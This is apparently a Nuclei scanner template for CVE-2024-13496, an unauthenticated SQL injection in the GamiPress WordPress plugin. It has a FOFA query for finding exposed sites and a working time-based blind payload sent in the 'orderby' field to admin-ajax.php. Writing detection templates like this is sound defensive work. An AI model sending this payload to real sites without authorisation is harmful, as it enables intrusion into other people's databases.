id: CVE-2024-13496

info:
  name: GamiPress <= 2.8.9 - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    GamiPress WordPress plugin version 2.8.9 and below suffers from an SQL injection vulnerability due to insufficient sanitization of user input, allowing attackers to execute arbitrary SQL commands.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL commands to extract, modify, or delete database contents, potentially compromising the entire WordPress installation.
  remediation: |
    Update GamiPress plugin to version 2.8.10 or later.
  reference:
    - https://abrahack.com/posts/gamipress-sqli/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13496
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-13496
    cwe-id: CWE-89
    epss-score: 0.02191
    epss-percentile: 0.80052
  metadata:
    max-requests: 2
    fofa-query: body="/wp-content/plugins/gamipress"
  tags: cve,cve2024,wp,wordpress,gamipress,sqli,wp-plugin,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 30s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=WebKitFormBoundaryPzS34wz7rAyyJYSi

        ------WebKitFormBoundaryPzS34wz7rAyyJYSi
        Content-Disposition: form-data; name="action"

        gamipress_get_logs
        ------WebKitFormBoundaryPzS34wz7rAyyJYSi
        Content-Disposition: form-data; name="nonce"

        {{nonce}}
        ------WebKitFormBoundaryPzS34wz7rAyyJYSi
        Content-Disposition: form-data; name="orderby"

        (SELECT/**/sleep(8)/**/FROM/**/dual/**/WHERE/**/1/**/LIKE/**/1)#
        ------WebKitFormBoundaryPzS34wz7rAyyJYSi--

    matchers:
      - type: dsl
        dsl:
          - 'duration>= 8'
          - 'status == 200'
          - 'contains(headers, "application/json")'
          - 'contains(body, "success\":true")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: nonce
        group: 1
        regex:
          - '"nonce":"([0-9a-z]+)"'
        internal: true
# digest: 4b0a00483046022100898709bc03855bbd2ecfc91ef04bb9f6ae3203cc26a47f8db801de561104cacf02210083568cd854998b56d2c9f453b6681350a09eecf515823309d798367204bc76c2:922c64590222798bb761d5b6d8e72950